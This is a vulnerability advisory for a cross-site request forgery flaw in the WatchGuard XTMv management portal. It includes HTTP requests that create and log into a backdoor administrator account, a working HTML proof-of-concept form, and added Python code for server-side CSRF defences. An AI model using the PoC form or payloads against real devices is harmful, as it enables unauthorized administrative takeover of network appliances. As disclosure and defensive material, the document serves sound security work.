<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery
Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt
1. Vulnerability Details
Affected Vendor: WatchGuard
Affected Product: XTMv
Affected Version: v11.12 Build 516911
Platform: Embedded Linux
CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
Impact: Privileged Access
Attack vector: HTTP
2. Vulnerability Description
Lack of CSRF protection in the Add User functionality of the
XTMv management portal can be leveraged to create arbitrary
administrator-level accounts.
3. Technical Description
As observed below, no CSRF token is in use when adding a new
user to the management portal.
POST /put_data/ HTTP/1.1
Host: 1.3.3.7:8080
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 365
Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
DNT: 1
Connection: close
{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}
The HTTP response indicates that the changes were successful.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-Length: 68
Expires: Sun, 28 Jan 2007 00:00:00 GMT
Vary: Accept-Encoding
Server: CherryPy/3.6.0
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Date: Sat, 10 Dec 2016 18:08:22 GMT
Content-Type: application/json
Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly; Path=/; secure
Connection: close
{"status": true, "message": ["The changes were saved successfully"]}
Now, the newly created backdoor account can be accessed.
POST /agent/login HTTP/1.1
Host: 1.3.3.7:8080
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: text/xml
X-Requested-With: XMLHttpRequest
Content-Length: 414
Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
DNT: 1
Connection: close
<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>
The response below shows the application issuing an authenticated
session cookie.
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
Content-type: text/xml
Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
Connection: close
Date: Sat, 10 Dec 2016 19:55:26 GMT
Server: none
Content-Length: 751
<?xml version="1.0"?>
<methodResponse>
<params>
<param>
<value>
<struct>
<member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
<member><name>response</name><value></value></member>
<member>
<name>readwrite</name>
<value><struct>
<member><name>privilege</name><value>2</value></member>
<member><name>peer_sid</name><value>0</value></member>
<member><name>peer_name</name><value>error</value></member>
<member><name>peer_ip</name><value>0.0.0.0</value></member>
</struct></value>
</member>
</struct>
</value>
</param>
</params>
</methodResponse>
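The request above carries a session cookie but nothing that a cross-site page could not also cause the browser to send, which is what the form in section 7 exploits. The following is an added example (not WatchGuard or KoreLogic code) of the server-side checks that would have rejected such a request: an HMAC-derived synchronizer token bound to the session, an Origin check against the portal's own origin, and a requirement for the JSON content type and custom header that the real client already sends. The function, header and constant names are hypothetical; the session id and JSON document are taken from the request shown in this section, the server key and the forged request are constructed.

```python
"""CSRF defences for a JSON state-changing endpoint, modelled on /put_data/.

Added example, not the vendor's code. Request shape is framework neutral:
a dict of headers, the raw body bytes, and the caller's session id.
"""
import hashlib
import hmac
import json
from urllib.parse import urlsplit

# The portal's own origin (constructed; mirrors the Host of the advisory request).
TRUSTED_ORIGIN = "https://1.3.3.7:8080"


def issue_csrf_token(session_id: str, server_key: bytes) -> str:
    """Derive a synchronizer token bound to one session. Because the token is an
    HMAC over the session id, nothing has to be stored server side and a token
    copied from another session fails verification."""
    return hmac.new(server_key, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(url: str) -> bool:
    """Exact scheme+host+port comparison; a prefix check would accept look-alikes."""
    got, want = urlsplit(url), urlsplit(TRUSTED_ORIGIN)
    return (got.scheme, got.netloc) == (want.scheme, want.netloc)


def check_state_changing_request(headers: dict, body: bytes,
                                 session_id: str, server_key: bytes) -> list:
    """Return the list of reasons to reject the request; an empty list means accept.
    Any single check below would have stopped the cross-site form post."""
    h = {k.lower(): v for k, v in headers.items()}
    problems = []

    # 1. A cross-origin <form> can only produce urlencoded, multipart or
    #    text/plain bodies; the legitimate client sends application/json.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        problems.append(f"content-type {ctype!r} is not application/json")

    # 2. A plain form submission cannot attach custom headers.
    if h.get("x-requested-with") != "XMLHttpRequest":
        problems.append("missing X-Requested-With header")

    # 3. Origin (Referer as fallback) must be the portal itself.
    if not same_origin(h.get("origin") or h.get("referer", "")):
        problems.append("request origin is not the management portal")

    # 4. Synchronizer token, compared in constant time (bytes avoid TypeError
    #    on non-ASCII input to compare_digest).
    expected = issue_csrf_token(session_id, server_key).encode()
    supplied = h.get("x-csrf-token", "").encode()
    if not hmac.compare_digest(supplied, expected):
        problems.append("CSRF token missing or invalid")

    # 5. Body must be a JSON object of the expected shape. A text/plain form
    #    body is "name=value" followed by CRLF, which a strict parser rejects.
    try:
        doc = json.loads(body)
        if not isinstance(doc, dict) or "add_entries" not in doc:
            problems.append("body is not the expected JSON object")
    except ValueError:
        problems.append("body is not valid JSON")

    return problems


# Constructed server secret; in practice load it from protected configuration.
SERVER_KEY = b"constructed-server-secret"
# Session id from the request shown in the advisory.
SESSION = "50f607247265897581a407bfb8b75e30d2b77287"

# The add-user document from the advisory (module fields omitted for brevity).
PAYLOAD = json.dumps({
    "__class__": "PageSystemManageAdminUsersObj", "users": [],
    "add_entries": [{"__class__": "AdminUserObj", "name": "hacked",
                     "domain": "Firebox-DB", "role": "Device Administrator",
                     "hash": "hacked", "enabled": 1, "rowindex": -1}],
    "upd_entries": [], "del_entries": []}).encode()

# What the portal's own UI would send once a token header is added (constructed).
LEGIT_HEADERS = {
    "Host": "1.3.3.7:8080", "Origin": TRUSTED_ORIGIN,
    "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest",
    "X-CSRF-Token": issue_csrf_token(SESSION, SERVER_KEY),
}

# What a browser sends for a text/plain form hosted elsewhere (constructed):
# no custom headers, a foreign Origin, and the JSON as a form field name.
FORGED_HEADERS = {"Host": "1.3.3.7:8080", "Origin": "https://attacker.example",
                  "Content-Type": "text/plain"}
FORGED_BODY = PAYLOAD + b"=\r\n"


def demo():
    """Run both requests through the checks; returns (legit_problems, forged_problems)."""
    return (check_state_changing_request(LEGIT_HEADERS, PAYLOAD, SESSION, SERVER_KEY),
            check_state_changing_request(FORGED_HEADERS, FORGED_BODY, SESSION, SERVER_KEY))


if __name__ == "__main__":
    legit, forged = demo()
    print("legitimate request:", "accepted" if not legit else legit)
    print("forged request rejected for:", forged)
```

Checks 1 through 3 are defence in depth; the token in check 4 is the one that does not depend on browser behaviour, and the endpoint should also refuse to fall back to cookie-only authentication when the token header is absent.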
4. Mitigation and Remediation Recommendation
The vendor has remediated this vulnerability in WatchGuard
XTMv v11.12.1. Release notes and upgrade instructions are
available at:
https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc. and Joshua Hardin.
6. Disclosure Timeline
2017.01.13 - KoreLogic sends vulnerability report and PoC to
WatchGuard.
2017.01.13 - WatchGuard acknowledges receipt of report.
2017.01.23 - WatchGuard informs KoreLogic that the
vulnerability will be addressed in the forthcoming
v11.12.1 firmware, scheduled for general
availability on or around 2017.02.21.
2017.02.22 - WatchGuard releases v11.12.1.
2017.03.10 - KoreLogic public disclosure.
7. Proof of Concept
-->
<html>
<body>
<form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
<input type="hidden"
name="{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked3","domain":"Firebox-DB","role":"Device Administrator","hash":"hacked3","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}"
value="" />
<input type="submit" value="Trigger" />
</form>
</body>
</html>
<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->